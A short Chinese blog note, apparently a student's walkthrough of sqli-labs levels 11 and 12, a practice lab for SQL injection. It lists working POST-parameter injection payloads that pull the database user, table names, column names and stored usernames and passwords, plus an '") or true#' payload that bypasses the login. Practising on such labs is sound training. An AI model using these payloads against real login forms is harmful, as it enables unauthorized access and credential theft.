note-07

sql-labs-less11

以前ctf练习题反而是post模式做的多些，
notice

注意原先请求的值要改为数据库不存在的值免得将后面的查询结果覆盖

hackbar下的结构

1	`uname=1'union select user(),database()#&passwd=&submit=Submit`

之后的注入拼接进uname后

爆用户和库名：

1	`1' union select user(),database()#`

爆表名：

1	`1'union select user(),group_concat(table_name) from information_schema.tables where table_schema='security'#`

爆字段：

1
2

1'union select user(),group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'#
不加and后面的话好像会把其它库的同名表下的字段爆出来

最后爆库：

1	`1'union select user(),group_concat(id,username,password) from users#`

less12

应该是加了检查，password不能为空

1	`uname=1&passwd=1") or true#&submit=Submit`

回显

Your Login name:Dumb
Your Password:Dumb

成功闭合sql查询,然后走流程通关。

#sql-labs

note-07

https://aidemofashi.github.io/2025/03/06/note-07/

作者

aidemofashi

发布于

2025年3月6日

许可协议

note-08 上一篇

note-06 下一篇